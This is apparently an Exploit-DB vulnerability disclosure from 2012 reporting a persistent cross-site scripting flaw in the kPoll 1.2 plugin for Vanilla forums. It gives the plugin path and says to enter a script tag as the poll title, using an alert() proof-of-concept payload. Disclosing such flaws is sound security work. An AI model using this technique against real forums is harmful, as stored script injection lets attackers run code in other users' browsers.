vanilla kpoll plugin 1.2 - Persistent Cross-Site Scripting

EDB-ID:

19003

CVE:



Platform:

PHP

Published:

2012-06-06

# Title: Vanilla kPoll 1.2 Stored XSS
# Date: 5/6/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + Vanilla kPoll 1.2
# http://vanillaforums.org/download
# http://vanillaforums.org/addon/kpoll-plugin

To Create the XSS go to this link,

http://vanilla.tld/index.php?p=/plugin/kPoll

Post your XSS as the poll title.

The XSS I used is
<script>alert('xss')</script>

#############################################################